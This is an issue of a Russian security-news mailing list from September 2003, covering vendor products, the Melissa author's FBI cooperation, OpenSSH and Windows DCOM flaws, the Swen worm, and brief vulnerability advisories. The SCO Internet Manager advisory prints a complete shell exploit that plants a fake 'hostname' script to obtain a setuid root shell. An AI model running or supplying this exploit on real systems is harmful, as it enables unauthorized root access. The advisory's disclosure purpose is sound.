Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
“Прогресс-Гарант” внедряет вертикальное решение SAP
18 сентября | Рубрика: Исследования, открытия, лабораторные разработкиСтраховая компания “Прогресс-Гарант” приступила к созданию корпоративной информационной системы (ИС) на базе компонентов, входящих в состав продукта mySAP Business Suite и пакета решений для страхового бизнеса SAP for Insurance корпорации SAP AG. ИС поможет оперативно управлять финансовыми ресурсами, принимать оптимальные управленческие решения и интегрировать системы финансового и страхового учета.
Предполагается автоматизировать процессы ведения управленческого и бухгалтерского учета, выпуска отчетности по российским и международным (IAS) стандартам, налогового учета, обработку входящих и исходящих платежей.
В настоящее время одной из важнейших задач страховщиков стала оперативная обработка входящих платежей и анализ сроков погашения дебиторской задолженности. Кроме того, очень остро стоит проблема проведения взаиморасчетов со страховыми агентами и брокерами. Для решения указанных проблем будет развернут контур FS-CD (“Сборы и выплаты”), входящий в состав SAP for Insurance.
В роли генерального подрядчика в данном проекте выступает компания “Сибинтек”, для некоторых работ будут привлекаться консультанты московского и зарубежных офисов SAP. Построение ИС будет завершено в конце II квартала 2004 г.
Впоследствии планируется развернуть систему в региональных подразделениях “Прогресс-Гаранта”, а также добавить в нее модули управления персоналом и взаимоотношениями с клиентами, электронного документооборота и корпоративное хранилище данных.
0Новая система защиты информации SecurIT
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Российский разработчик программных средств защиты информации компания SecurIT выпустила продукт Zlogin – систему двухфакторной аутентификации пользователей с помощью электронных ключей.
Система упрощает работу пользователей, избавляя их от необходимости запоминать и менять многочисленные пароли, а также снижает нагрузку на ИТ-департамент. Администрирование системы осуществляется централизованно через службу каталогов.
Новый продукт повышает безопасность сетевых ресурсов за счет автоматической генерации “сильных” паролей и их смену с заданной периодичностью без участия пользователя.
Система Zlogin хранит учетные записи для входа в сеть в защищенной памяти электронных ключей или смарт-карт и обеспечивает аутентификацию пользователей в системах Windows, Novell NetWare, Linux.
Продукт предназначен для предприятий с гетерогенной структурой сети, когда в процессе работы пользователям требуется одновременное подключение к ресурсам, расположенным на серверах разных платформ, например под управлением Windows и Novell NetWare.
1Хакеры на службе ФБР
18 сентября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль Проблемные ситуации, информационная преступность, сетевые войныИзвестный хакер Дэвид Смит (David Smith), автор вируса Melissa, причинившего в
1999 году многомиллионный ущерб пользователям сети Интернет, оказал содействие
ФБР в поимке других не менее известных хакеров. Как сообщает агентство
Associated Press со ссылкой на документы, предоставленные прокуратурой, Смит
начал работать со спецслужбами сразу после своего ареста. В его задачу входило
отслеживание хакеров по всему миру и контакт с ними. Таким образом, было
определено местонахождение многих из создателей опасных вирусов.
В
резултате сотрудничества Дэвид Смит с ФБР в Нидерландах был арестован Ян Де Вит
(Jan DeWit), автор вируса "Anna Kournikova", а в Великобритании Саймон Вэллор
(Simon Vallor), создавший "Gokar", который доставил немало неприятностей
корпорации Microsoft. Дэвид Смит также разработал для ФБР специальную программу,
которая позволяет осуществлять мониторинг отправителей электронных посланий даже
в том случае, если они пытаются скрыть свою идентификацию в сети.
Учитывая помощь Смита ФБР, суд приговорил его не к положенному по закону
10-летнему сроку заключения, а только к 20 месяцам тюрьмы. Сейчас Дэвид Смит
отбывает наказание в федеральной тюрьме Форт-Дикс.
2
Пробел в защите SSH обнажает сети
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныВ SSH обнаружена серьезная ошибка, ставящая под угрозу серверы во всем мире.
SSH — это широко используемая оболочка защищенного дистанционного управления для платформ Unix, Linux и BSD. Эксперты утверждают, что злоумышленники многие месяцы пользовались уязвимостью для получения несанкционированного доступа к системам.
Для Unix-систем не редки случаи, когда уязвимость эксплуатируется подпольным сообществом месяцами, говорит Мейффрет. «С уязвимостями SSH такое случалось и раньше... это явно больная тема для Unix-уязвимостей».
Специалист по защите данных Марк "Simple Nomad" Лавлес, сотрудничающий с BindView Corporation, не сомневается в существовании эксплойта для данной уязвимости. «У кого-то есть эксплойт... многие заявляют, что располагают им, и похоже, что некоторые не врут», — сказал он в интервью по телефону. По его словам, уязвимы все версии OpenSSH, установленные на любых дистрибутивах Linux и BSD, исключая те, что были обновлены на версию 3.7.1 в течение последних часов.
Лавлес говорит, что на самом деле в ПО две уязвимости. «Версия 3.7 вышла рано утром, а уже через пару часов появилась версия 3.7.1. Я подозреваю, что 3.7 исправляет один баг, а 3.7.1 — другой». Однако не исключено, что существуют смягчающие факторы. «Ходят слухи о том, что для работы эксплойта необходимо, чтобы был разрешен удаленный вход в SSH на уровне root, — говорит Лавлес. — Но это только слухи». По его словам, нужно как можно скорее провести апгрейд на 3.7.1. «Код эксплойта распространится за считанные часы», — предупредил он.
CERT опубликовал рекомендации, однако они были распространены до выпуска версии 3.7.1. Патч для OpenSSH и рекомендации уже обновлены. «Все версии sshd в OpenSSH до версии 3.7.1 содержат ошибки управления буфером. Пока не ясно, возможно ли использование этих ошибок, но мы советуем не медлить с их устранением», — говорится в рекомендации.
3Зарегистрирована эпидемия нового сетевого червя!
18 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныЛаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает об обнаружении сетевого червя I-Worm.Swen. Вредоносная программа распространяется через электронную почту, сеть файлообмена Kazaa и каналы IRC.
Зараженные письма могут иметь в качестве отправителя различные службы
компании Microsoft, например, MS Technical Assistance, Microsoft Internet
Security Section и т.д.
Текст письма призывает пользователя установить
"специальный патч к Microsoft", который находится во вложении.
По информации экспертов 'Лаборатории Касперского', на настоящий момент заражению подверглось более 30000 компьютеров по всему миру. Их число продолжает увеличиваться.
Процедуры защиты от "I-Worm.Swen" уже добавлены в базу данных Антивируса Касперского®.
Более подробная информация о черве I-Worm.Swen будет опубликована
дополнительно.
Спаму объявили войну
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Первые судебные иски к компаниям, рассылающим
спам, будут поданы уже в конце этого года. Такое заявление сделал вчера директор
по маркетингу представительства "Лаборатории Касперского" в России, странах СНГ
и Балтии Владимир Тимошин.
По подсчетам разработчика программных продуктов для защиты от вирусов, спама
и хакерских атак "Лаборатории Касперского", спамерская контора может заработать
до $100 тыс. в месяц. "Мы определяем спам, как массовую, анонимную и
несанкционированную рассылку, которая не запрашивалась получателем", - уточнил
Владимир Тимошин. По оценкам Rambler, экономический ущерб от спама в прошлом
году составил порядка $200 млн. Компания "Лаборатория Касперского" входит в "Национальную коалицию против
спама". В качестве участников коалиции также представлены: холдинг "Голден
Телеком", российское представительство Microsoft, почтовая служба Mail.ru,
интернет-портал Rambler, служба e-mail-рассылок Subscribe.ru, а также компания
"Ашманов и партнеры". Все они призывают российское интернет-сообщество
объединить усилия в борьбе со спамом. "Мы надеемся на принятие законодательных
актов в такой борьбе, ведь сейчас спам занимает до 40% трафика провайдеров", -
сказал Владимир Тимошин. Для борьбы со спамом уже существует меморандум, разработанный при помощи
"Ассоциации Документальной Электросвязи" в соответствии с поручением Министра РФ
по связи и информатизации. В документе рассматривается негативное влияние
вредоносных программ и спама на инфокоммуникационные системы. Согласно тексту
меморандума, для решения этой проблемы достаточно внести изменения и дополнения
в действующие федеральные законы "О рекламе", "О почтовой связи" и кодексе об
административных правонарушениях.
IEEE выпустит стандарт по безопасности операционных систем
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Институт инженеров по электротехнике и электронике (Institute of Electrical and Electronics Engineers, IEEE) начал разработку стандарта для определения основных требований к обеспечению безопасности “коробочных” операционных систем общего назначения.
Стандарт IEEE P2200 "Основы безопасности операционной системы” (Base Operating System Security, BOSS) будет касаться проблем с безопасностью систем, возникающих из-за инженерных недоработках в ОС. Стандарт будет обращен к важнейшим функциям кросс-платформенной безопасности, включая идентификацию, контроль доступа и криптографию.
Стандарт, который должен увидеть свет до конца 2004 года, будет построен на основании указаний Американского национального института по стандартам и технологиям и в терминах, принятых Международной организацией по стандартизации (International Organization for Standards, ISO).
6Обнаружена серьезная уязвимость в OpenSSH
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныКоординационный центр CERT предупредил о серьезной уязвимости в оболочке OpenSSH связанной с удаленным переполнение буфера. Уязвимость, обнаруженная в версиях оболочки до 3.7, позволяет выполнить произвольный код на уязвимом сервере. Для этого атакующий должен изменить некоторые параметры OpenSSH и передать на компьютер-жертву массивные пакеты данных SSH (размером более 10 МБ). Проект OpenBSD, работающий над OpenSSH, уже выпустил версию 3.7.1 и рекомендовал перейти на нее во избежание атак хакеров.
7Сибирская Ярмарка, Новосибирск 23-26 сентября. XII специализированная выставка СПАССИБ-СИББЕЗОПАСНОСТЬ-СИБСВЯЗЬ
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, датыСибирская Ярмарка, Новосибирск 23-26 сентября. XII специализированная
выставка СПАССИБ-СИББЕЗОПАСНОСТЬ-СИБСВЯЗЬ.
С 23 по 26 сентября
Выставочное общество Сибирская Ярмарка вот уже в двенадцатый раз проводит
специализированную выставку СИББЕЗОПАСНОСТЬ-2003. Одновременно пройдут выставки
СИБСВЯЗЬ и СПАССИБ.
СИББЕЗОПАСНОСТЬ-2003
Безопасность человека и общества – одна из глобальных проблем XXI века. А что мы понимаем под безопасностью? Какие опасности нам угрожают? Какие угрожают человеку, какие государству, обществу, человечеству в целом? Существуют ли формы защиты от них?
Последнее время эти вопросы так или иначе затрагивают каждого из нас. Как отдельная личность, так и государственные структуры ищут пути решения этих вопросов.
Актуальность выставки СИББЕЗОПАСНОСТЬ в свете последних событий в России не вызывает сомнения. Во-первых, выставка - это не просто коммерческое мероприятие, на котором заключаются сделки, встречаются партнеры. Выставка – это показатель развития отрасли, потенциальных возможностей данного региона, презентация новых предприятий и новых технологий. Во-вторых, - это возможность общения с широкими слоями населения, пропаганды новых методов работы. И, наконец, выставка - это место встречи государственных структур и коммерческих предприятий, возможность обсуждения проблем взаимодействия государственных органов управления с частными охранными предприятиями для объединения усилий по обеспечения безопасности личности и государства.
В настоящее время идет активная подготовка к выставке. На сегодняшний день более 60 фирм подтвердили свое участие в разделе СИББЕЗОПАСНОСТЬ. Общее количество участников в блоке СИББЕЗОПАСНОСТЬ-СИБСВЯЗЬ-СПАССИБ- более 270 из 20 городов России.
На стендах участников выставки СИББЕЗОПАСНОСТЬ будут представлены последние разработки комплексного оснащения и проектирования интегрированных систем безопасности, охранной и пожарной сигнализации, систем защиты информации, охранного телевидения, оборудования, необходимого для защиты конституционного права юридических и частных лиц на сохранность жизни, имущества и информации. На сегодняшний день свое участие в выставке подтвердили такие ведущие новосибирские фирмы как: Аргус Спектр, Грумант, ГРиАл, Формула безопасности, Бизнес Защита, Растр, Центр информационной безопасности, Дозор, Системы безопасности, Сибирский Арсенал, Управление вневедомственной охраны, Новосибирский филиал НИЦ ОХРАНА, ПауэрСиб, а также НПО Спецматериалов (Санкт-Петербург); Асстир, Дифенс Ай Ди, Мир Безопасности, Витязь (Москва); БАСТИОН (Ростов-на-Дону), НИКИ радиоэлектронной техники (Пенза); НИИ ПРОЕКТ (Томск).
В последнее время в выставке СИББЕЗОПАСНОСТЬ появилась новая тематика – оборудование для офисов в виде шредеров по уничтожению бумаг, услуги по изготовлению пластиковых карт, печатная продукция на специальных бумагах, имеющих степени защиты. Появились и первые участники. Это новосибирские фирмы: АльфаТех Плюс, Нисса-Сибирь, R-Style и Шредер Компани (Москва).
Работа на выставке не ограничится деловыми встречами и переговорами на стендах. Оргкомитетом выставки СИББЕЗОПАСНОСТЬ запланирован серьезный научно-практический блок, в котором примут участие специалисты из Москвы, Новосибирска и других городов Сибири.
Под руководством В.Ф. Городецкого, мэра Новосибирска пройдет заседание Совета общественной безопасности, посвященное вопросам безопасности личности, а также заседание Сибирского союза предприятий безопасности – общественной организации, в которую входит около 2-х десятков предприятий безопасности Новосибирска.
В этом году в программных мероприятиях более активно примут участие коммерческие фирмы, которые проведут обучающие семинары и презентации своих разработок.
Фирма «Гарант» (Новосибирск) проведет семинар «Компьютерная система видеонаблюдения «ГАРАНТ». «Бизнес-Защита» (Новосибирск) заявила семинар «Организация центра обработки вызовов: проблемы и решения». Специалисты компании «Кардинал» расскажут о системах защиты информации. Научно-исследовательский и конструкторский институт радиоэлектронной техники (Пенза) проведет семинар «Современные системы физической защиты особо важных объектов. Теория и практика».
СПАССИБ-2003
Вот уже третий год выставка СПАССИБ имеет официальную поддержку МЧС России и Сибирского регионального центра МЧС (Красноярск). 19 мая 2003 г. Сибирским региональным центром МЧС России издан приказ «о проведении специализированной выставки СПАССИБ-2003 и научно-практической конференции» и разработан план мероприятий по подготовке к выставке. В результате все подразделения МЧС Сибирского федерального округа примут участие в подготовке и работе СПАССИБ-2003. В официальной церемонии открытия выставки примут участие: В.И. Терешков, зам. начальника Сибирского регионального центра МЧС России; Д.Э Сафиуллин, начальник ГУ ГО ЧС НСО.
Экспозиция выставки будет представлена стендами Главных управлений Сибирского федерального округа и коммерческими предприятиями. Среди участников - Сибирский региональный центр ГО ЧС, который представит коллективную экспозицию фирм Москвы, Красноярского края, Сибирского региона, главные управления ГО ЧС Новосибирской, Томской, Читинской областей, Алтайского края, Республик Хакасия, Тыва, Бурятия, Новосибирская областная поисково-спасательная служба МЧС РФ, Управление пожарной охраны, Управление ГИБДД ГУВД Новосибирской области, Федерация пожарно-прикладного спорта, фирмы Арника, Сибсервис, Пирант, Сибирский Проект, ТехноАвиа – Новосибирск; СК-Пром - Екатеринбург.
В программной части выставки СПАССИБ научно-практическая конференция «Перспективы развития системы мониторинга и прогнозирования ЧС природного и техногенного характера», в которой примут участие специалисты МЧС России , главных управлений ГО ЧС Сибирского Федерального округа, поисково-спасательных служб, научных институтов, коммерческих предприятий. Основные вопросы конференции - создание и развитие Единой дежурно-диспетчерской службы по вопросам обеспечения безопасности населения, использование новых методов мониторинга ЧС, выработка мер по предотвращению чрезвычайных ситуаций и смягчение их последствий.
Сибирским региональным центром МЧС запланирован сбор с руководителями территориальных центров мониторинга, лабораторного контроля и прогнозирования чрезвычайных ситуаций природного и техногенного характера; показ новых разработок средств спасения на стендах участников и показательные выступления спасателей. Все дни работы выставки на первом этаже павильона будет работать «Детский городок», где школьники смогут познакомиться с навыками оказания первой помощи пострадавшим, правилами поведения на дорогах и в чрезвычайных ситуациях.
СИБСВЯЗЬ-2003
На сегодняшний день экспозиция выставки СИБСВЯЗЬ уже превысила прошлогодний рубеж.
Ведущие фирмы Новосибирска, Москвы, Санкт-Петербурга представят оборудование для систем связи, коммуникационное оборудование, офисные учрежденческие АТС, структурированные кабельные системы, аккумуляторы, биллинговые системы, телефоны и аксессуары для мобильной связи, электронные компоненты. Среди участников: Сайрус Системс (Москва), АЕСП Сибирь (Новосибирск), Энергон (Москва), НЭТА (Новосибирск), Вэлком Интернешнл (Москва), Элкос (Москва), Сибирьтелеком (Новосибирск), ИНТЕХ (Новосибирск), Электро-Лиазон (Москва), «ЗапСибТранстелеком» (Новосибирск), «Сотел» (Новосибирск), «Би Лайн» (Новосибирск), «Волоконно-оптическая техника» (Москва), Сибирская компания НЕМАН (Новосибирск). ЗАО «Аргуссофт Компани» (Москва), ООО «Мега Электроника» (Санкт-Петербург), ООО «Элтех» (Санкт-Петербург), ООО «Сибэлектронкомплект» (Новосибирск), ЗАО «Компания Элкосиб» (Новосибирск), ЭлКоТел (Новосибирск).
Обширна программа выставки СИБСВЯЗЬ. Под руководством Администрации Новосибирской области пройдет Форум «Информационная поддержка деятельности органов местного самоуправления (на примере реализации городской целевой программы «Электронный Новосибирск в 2002-2006гг.)»
В программе: семинар фирмы «Сонет Технолоджис» (Москва) «Структурированные системы: европейское качество, сделанное в России»; семинар фирмы AESP «Signamax(tm) Networking System как основа современных корпоративных информационных систем»; семинар «Транспортные сети SDH», проводит фирма «Ротек» (Новосибирск); семинар «Решения ZyXEL для последней мили», проводит «Лаборатория СПГиД» (Новосибирск); семинар «Комплексные решения компании «Huawei» для сетей проводной и мобильной связи», проводит компания «Huawei»
Выставка СИББЕЗОПАСНОСТЬ-СИБСВЯЗЬ-СПАССИБ - крупнейший за Уралом региональный форум, где специалисты могут познакомиться с новейшими достижениями рынка, найти партнеров, заключить выгодные контракты, повысить свой профессиональный уровень, обсудить проблемы и перспективы развития отрасли.
Генеральный информационный Интернет-спонсор выставки: портал Sec.ru.
8RUSSIAN TELECOMS – специальный выпуск, Женева, 12-18 октября 2003г.
18 сентября | Рубрика: События, семинары, конференции, датыRUSSIAN TELECOMS – специальное полноцветное издание на английском языке, предназначенное для распространения на 9-й Всемирной выставке-форуме по телекоммуникациям и информационным технологиям (Женева, 12-18 октября 2003 года). Организаторы выставки и форума – Международный союз электросвязи (ITU) и правительства 189 стран. Издатель Russian Telecoms – компания "Гротек" - единственная российская компания, получившая напрямую от организаторов выставки статус официального информационного спонсора. Тираж издания – 10 000 экземпляров.
ITU Telecom World – выставка, проходящая раз в четыре года в Женеве, известна во всем мире как телекоммуникационная выставка, которую не принято пропускать. В выставке примут участие 817 компаний-экспонентов из разных стран мира. Организаторы ожидают, что выставку посетят не менее 115 000 руководителей и специалистов.
В Russian Telecoms будут опубликованы официальные материалы Минсвязи России, МАП России и статьи ведущих аналитиков отрасли, а также мнения руководителей телекоммуникационных компаний о степени инвестиционной привлекательности отдельных секторов отрасли связи в России.
Информационный партнер Russian Telecoms – компания "Росбизнесконсалтинг" и Интернет-издание CNews.ru – подготовили специальный обзор российского рынка телекоммуникаций. В обзоре подробно представлены экономические показатели и рыночные индикаторы отрасли, а также названы компании-лидеры телекоммуникационного рынка.
По результатам предыдущего издания, немалый интерес у зарубежного читателя вызвала и рубрика Who is who in Russian telecommunications, где представлена краткая биографическая и контактная информация о руководителях государственных ведомств, отраслевых институтов и других ведущих организаций отрасли. Информация о руководителе Вашей компании, представленная в данной рубрике наряду с другими лидерами отечественного телекоммуникационного рынка, привлечет, по мнению редакции, дополнительное внимание участников ITU Telecom World'2003. Данная рубрика также будет анонсирована на обложке издания.
Размещение рекламы Вашей компании в Russian Telecoms может значительно увеличить ее эффективность. Мы готовы взять на себя перевод материалов и их адаптацию для зарубежной профессиональной аудитории.
Срок подачи рекламных материалов: на русском языке – до 19 сентября, на английском – до 23 сентября 2003 г.
Координатор проекта Russian Telecoms: Терехова Ольга Николаевна (095)251-66-54, 251-68-45, 8-916-696-64-75 (моб) e-mail: terehova@groteck.ru
Выпускающий редактор проекта Russian Telecoms: Рогачева Зоя Вячеславовна (095) 251-3171, (095) 251-6845, факс: (095) 251-3389, е-mail: rogacheva@groteck.ru
Дополнительная информация: www.rt.groteck.ru, www.itu.int/WORLD2003.
9Новый VPN-продукт от компании "Физтех-софт"
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность бизнесаКомпания "Физтех-софт" объявляет о выходе нового VPN - продукта - системы защиты информации StrongNet_, предназначенной для построения защищенных виртуальных частных сетей и обеспечения безопасной работы компьютера в сети.
StrongNet_ позволяет:
- защитить трафик внутри локальных сетей (localnet-VPN);
- обеспечить защищенный доступ удаленных клиентов к корпоративной сети;
- использовать функции встроенного персонального межсетевого экрана (firewall).
StrongNet_ существенно дополняет линейку продуктов компании "Физтех-софт". Используя продукты StrongDisk Server, StrongNet и StrongDisk Pro, можно создавать комплексные решения, которые обеспечивают безопасность информации на любом этапе обработки или хранения в сети.
StrongDisk Server обеспечивает защиту информации при хранении и обработке на сервере.
StrongNet обеспечивает защиту данных при передаче между сервером и клиентами, реализует функции межсетевого экрана и обеспечивает надежную аутентификацию пользователей.
StrongDisk Pro позволяет защитить клиентские места, включая временно сохраняемую на них информацию.
На комплексные решения, включающие эти три продукта, будут действовать специальные цены.
Принципы работы StrongNet_:
StrongNet_ создает защищенный канал для передачи данных между компьютерами в локальной сети или Интернет. Вся информация передается по этому каналу в зашифрованном виде с использованием туннелирования. При установке соединения стороны сначала проходят двухстороннюю аутентификацию, а затем генерируют сеансовые ключи, используемые для шифрования трафика. Система использует предварительное распределение ключей аутентификации, что снимает необходимость в создании и поддержке Удостоверяющих центров (Certificate Authority).
Основные возможности StrongNet_:
- Предварительное распределение ключей аутентификации (RSA с длиной до 4096 бит). В состав системы StrongNet_ входит утилита Центр генерации ключей , которая позволяет создавать и распределять ключи между пользователями.
- Надежные и производительные алгоритмы кодирования с длиной ключа до 448 бит (AES-256, Blowfish-448, IDEA-128, CAST-128, SAFER-128 и др.)
- Работа с любыми электронными ключами и смарт-картами, поддерживающими стандарт PKCS#11, среди которых iKey 10хх/20хх, eToken R2/Pro, ePass 1000/2000, CryptoIdentity и другие. Ключи аутентификации могут храниться также в обычных файлах на сменных носителях.
- Встроенный межсетевой экран (firewall). Кроме защиты данных, передаваемых между двумя компьютерами по сети, StrongNet_ предоставляет функции персонального межсетевого экрана (firewall), который будет осуществлять фильтрацию входящих и исходящих IP-пакетов по определенным критериям. В зависимости от IP-адреса источника и пункта назначения, номера порта источника и пункта назначения и сетевого протокола пакет может пропускаться или блокироваться.
- Архитектура StrongNet построена в полном соответствии со спецификацией IPSec.
- Простой и удобный интерфейс пользователя. StronNet_ можно настроить таким образом, что все необходимые ключи будут загружаться уже при запуске операционной системы, и пользователю для установки защищенного соединения достаточно будет выбрать IP-адрес нужного компьютера и нажать на кнопку "Connect".
Поддерживаемые операционные системы: MS Windowsr NT/2000/XP/2003
Демонстрационную версию StrongNet_ можно загрузить с web-сайтов компании "Физтех-софт".
10Журнал «Системы безопасности» начинает публикацию тестов оборудования по безопасности, проводимых “Security Installer” (UK)
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационные ресурсыС № 4, 2003 журнал «Системы безопасности» начинает публикацию тестов различных средств обеспечения безопасности. Результаты тестов предоставил британский журнал “Security Installer”, ведущее издание в данной отрасли в Великобритании.
Сейчас журнал готовит к публикации следующие тесты:
- iWISE 815 DT датчик ОПС (производитель компания Rokonet);
- 4040 wireless control interface (производитель компания FM Electronics).
Кроме того, в № 5 появятся тесты таких продуктов, как:
- WVCS320 цветная купольная камера (производитель компания Panasonic);
- SNC-RZ30 сетевая камера (производитель компания Sony);
- TK-C720 цветная камера (производитель компания JVC);
- PROX SA & PROX SRB proximity-считыватель (производитель компания Pyronix).
Журнал «СБ» считает, что потребители и интеграторы имеют право знать, с чем они работают.
Редакция приглашает дистрибьюторов и реселлеров указанного оборудования разместить рекламу рядом с результатами тестов. За счет того, что тесты, проведенные “Security Installer”, ориентированы в первую очередь на инсталляторов, интеграторов и конечных пользователей, реклама в них напрямую влияет на увеличение продаж, так как на сегодняшний день это самые авторитетные и независимые тесты в Европе. Тесты будут размещены на лучших рекламных позициях и дополнительно анонсированы на обложке журнала.
По оборудованию Rokonet и FM Electronics редакция проводит поиск российских инсталляторов и представителей. Если Вы уже являетесь или заинтересованы стать дистрибьютором указанных компаний, пожалуйста, свяжитесь с редакцией по телефону или электронной почте solodovnikova@groteck.ru до 24.09.2003.
Если у Вас есть готовые тесты оборудования, Вы можете прислать их нам для обсуждения возможности публикации. По мнению редакции, это самый эффективный способ привлечь внимание потребителей к Вашей продукции.
"Занимаясь международным маркетингом, я отвечаю за публикацию в журнале
«Системы безопасности» и других изданиях компании «Гротек» наиболее интересных
материалов мировой специализированной прессы – чтобы наши читатели получали еще
более разносторонний и качественный продукт. Мне интересно Ваше мнение о том,
какие материалы должны появиться в 2003-2004 гг., и Ваше отношение к этим
материалам. Пожалуйста, направляйте комментарии и пожелания на мой электронный
адрес."
С уважением,
Екатерина Солодовникова
Менеджер по международному
маркетингу
solodovnikova@groteck.ru
Тел.: +7
(095) 251 6845. Факс: +7 (095) 251 3389
Руководитель проекта СБ
Марина Садекова
sadekova@groteck.ru
Хакеры научились использовать новые дыры в Windows
18 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныХакеры уже научились использовать новые дыры в интерфейсе DCOM протокола RPC, обнаруженные в операционных системах семейства Windows NT. Эти дыры по своей сути очень напоминают уязвимость, использовавшуюся червем Blaster, поразившим интернет в августе нынешнего года. О возможном появлении нового похожего на Blaster червя эксперты по безопасности предупреждали практически сразу после появления информации о новых брешах.
На нынешней неделе сотрудникам компании iDefence удалось обнаружить первую программу, использующую новые дыры в DCOM RPC. Эта программа, найденная на некоем китайском сайте, способна поражать компьютеры, работающие под управлением ОС Windows 2000. Операционные системы Windows XP и Windows Server 2003, несмотря на наличие в них уязвимостей, программа не поражает. Впрочем, реализовать дополнительную функциональность в зловредной программе можно в любой момент.
По мнению специалистов iDefence, появления нового червя, аналогичного Blaster, можно ждать со дня на день. Информацию о существовании кода для использования дыр в DCOM RPC подтверждают и в Microsoft. По сведениям агентства AP, в компании ведут анализ обнаруженного вредоносного кода. Всем пользователям уязвимых версий Windows эксперты в один голос рекомендуют срочно установить патч.
12Автор вируса Melissa сдал ФБР нескольких хакеров
18 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность бизнесаНа нынешней неделе появилась новая информация об обстоятельствах суда над автором почтового вируса Melissa Дэвидом Смитом. Напомним, что Melissa был одним из первых массовых почтовых червей. Его эпидемия разразилась в 1999 году и нанесла значительный финансовый ущерб. Автор Melissa был арестован еще в 1999 году, а в 2002 г. ему был вынесен приговор. Смит получил 20 месяцев лишения свободы, хотя судья мог назначить наказание в виде тюремного срока до десяти лет.
Как выяснилось, причиной относительной мягкости приговора стало согласие Смита сотрудничать с ФБР в поимке других хакеров. Сотрудничество с властями автор Melissa начал практически сразу после ареста. По информации агентства Associated Press, Смит сдал властям, по меньшей мере, двух других вирусописателей. В 2001 г. он сообщил ФБР известные ему координаты авторы червя Anna Kournikova Яна Девита, который впоследствии сдался властям. Позднее в том же 2001 году Смит передал ФБР записи своих переговоров с британцем Саймоном Вэллором, создавшим вирус Gokar.
Помощь в поимке других вирусописателей не осталась незамеченной судом. В апреле 2001 года прокурор Кристофер Кристи направил письмо судье Джозефу Гриневею, который вел дело против Смита. Ознакомившись с предоставленной в письме информацией судья, по всей видимости, предпочел не выносить слишком суровый приговор. Сам Дэвид Смит продолжает отбывать заключение и предпочитает не обсуждать свое сотрудничество с ФБР с прессой.
13Поднятие привилегий и слабые сессионные куки в KDE
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: KDE 2.x-3.x Опасность: Низкая Наличие эксплоита: Нет Описание: Две уязвимости обнаружено в KDE. Злонамеренный пользователь может поднять свои привилегии и подобрать сессионные куки.
Пример/Эксплоит: Нет Решение: Обновите KDE до версии 3.1.4: ftp://ftp.kde.org/pub/kde/security_patches |
Раскрытие чувствительной информации и межсайтовый скриптинг в Nokia Electronic Documentation (NED)
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Nokia Electronic Documentation (NED) 5.0 Опасность: Низкая Наличие эксплоита: Да Описание: Множественные уязвимости обнаружены в Nokia Electronic Documentation (NED). Злонамеренный пользователь может раскрыть чувствительную информацию или выполнить XSS нападение. 1. удаленный пользователь может запросить специально обработанный URL, чтобы выполнить XSS нападение. 2. Программное обеспечение не проверяет параметр "location" при попытке доступа к произвольным ресурсам. В результате удаленный пользователь может просматривать содержание директорий или использовать NED в качестве открытого прокси. Пример/Эксплоит:
URL производителя:http://www.nokia.com Решение: Ограничте доступ к Web интерфейсу только из доверенной сети. Дождитесь официального исправления уязвимости, которое планируется выпустить в начале следующего года. |
Локальное выполнение произвольного кода в Internet Manager (mana) для SCO UNIX
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: SCO Internet Manager (mana) Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Internet Manager (mana) для SCO UNIX. Локальный пользователь может получить root привилегии на системе. Локальный пользователь может установить REMOTE_ADDR переменную среды к '127.0.0.1' и затем запустить '/usr/internet/admin/mana/mana', чтобы заставить приложение выполнить 'menu.mana' файл без требуемой авторизации. Также сообщается, что локальный пользователь может установить переменную окружения PATH_INFO к '/pass-err.mana' и PATH к './:$PATH', чтобы заставить mana выполнить файл './hostname' с root привилегиями. Пример/Эксплоит: #!/bin/sh # OpenServer 5.0.7 - Local mana root shell REMOTE_ADDR=3D127.0.0.1 PATH_INFO=3D/pass-err.mana PATH=3D./:$PATH export REMOTE_ADDR export PATH_INFO export PATH echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname chmod 755 hostname /usr/internet/admin/mana/mana > /dev/null /tmp/sh URL производителя: http://www.sco.com/ Решение: Установите следующую заплату: ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19 |
Локальное переполнение буфера в игре 'spider для Linux систем
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
